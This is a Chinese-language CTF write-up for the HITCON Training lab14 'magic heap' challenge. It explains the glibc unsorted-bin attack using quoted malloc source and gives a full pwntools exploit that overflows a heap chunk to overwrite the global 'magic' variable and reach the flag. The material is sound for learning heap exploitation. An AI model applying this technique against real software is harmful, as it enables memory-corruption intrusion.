HITCON Training lab14 magic heap
热度 71 ℃
简介 : 一道关于unsort bin利用的文章,unsort bin的利用和top chunk的利用差不多,没有很难,把数据结构里的双向链表弄明白就很容易理解了。来解一解training lab中的题目。
解析 : unsort bin我目前感觉是没什么用的,因为实质上就是一个指针赋值了而已。。
原理 : 就是在unsort bin中的一块chunk处,将该chunk的bk指针改为任意一处,因为unsort bin的遍历是倒叙的,也就是按照bk指针来遍历的。 所以说,改了bk指针后有不一样的效果。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) { bck = victim->bk; if (__builtin_expect(chunksize_nomask(victim) <= 2 * SIZE_SZ, 0) || __builtin_expect(chunksize_nomask(victim) > av->system_mem, 0)) malloc_printerr(check_action, "malloc(): memory corruption", chunk2mem(victim), av); size = chunksize(victim); /* If a small request, try to use last remainder if it is the only chunk in unsorted bin. This helps promote locality for runs of consecutive small requests. This is the only exception to best-fit, and applies only when there is no exact fit for a small chunk. */ /* 显然,bck被修改,并不符合这里的要求*/ if (in_smallbin_range(nb) && bck == unsorted_chunks(av) && victim == av->last_remainder && (unsigned long) (size) > (unsigned long) (nb + MINSIZE)) { .... } /* remove from unsorted list */ unsorted_chunks(av)->bk = bck; bck->fd = unsorted_chunks(av);
1 2 unsorted_chunks(av)->bk = bck; bck->fd = unsorted_chunks(av);
victim = unsorted_chunks(av)->bk=p
bck = victim->bk=p->bk = target addr-16
unsorted_chunks(av)->bk = bck=target addr-16
bck->fd = *(target addr -16+16) = unsorted_chunks(av);
再来看题目 :
1 2 3 4 5 6 7 ➜ magicheap checksec ./magicheap [*] '/home/parallels/Desktop/PWN/PwnWiKi/heap/magicheap/magicheap' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000)
看了下程序,就在edit编辑块有任意字节堆溢出,所以这时候就可以利用好unsort bin。而且这里只要不使得magic <= 0x1305
就可以cat flag
了。所以说直接利用unsort bin将magic
EXP : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 from pwn import * r = process('./magicheap') def create_heap(size, content): r.recvuntil(":") r.sendline("1") r.recvuntil(":") r.sendline(str(size)) r.recvuntil(":") r.sendline(content) def edit_heap(idx, size, content): r.recvuntil(":") r.sendline("2") r.recvuntil(":") r.sendline(str(idx)) r.recvuntil(":") r.sendline(str(size)) r.recvuntil(":") r.sendline(content) def del_heap(idx): r.recvuntil(":") r.sendline("3") r.recvuntil(":") r.sendline(str(idx)) create_heap(0x10,'AAAAAAAA') create_heap(0x90,'AAAAAAAA') create_heap(0x10,'AAAAAAAA') del_heap(1) payload = p64(0x0)*3 + p64(0xa1) + p64(0x0) + p64(0x6020C0 - 0x10) edit_heap(0,len(payload)+1,payload) create_heap(0x90,p64(0x1305)) sleep(0.1) r.sendline('4869') r.interactive()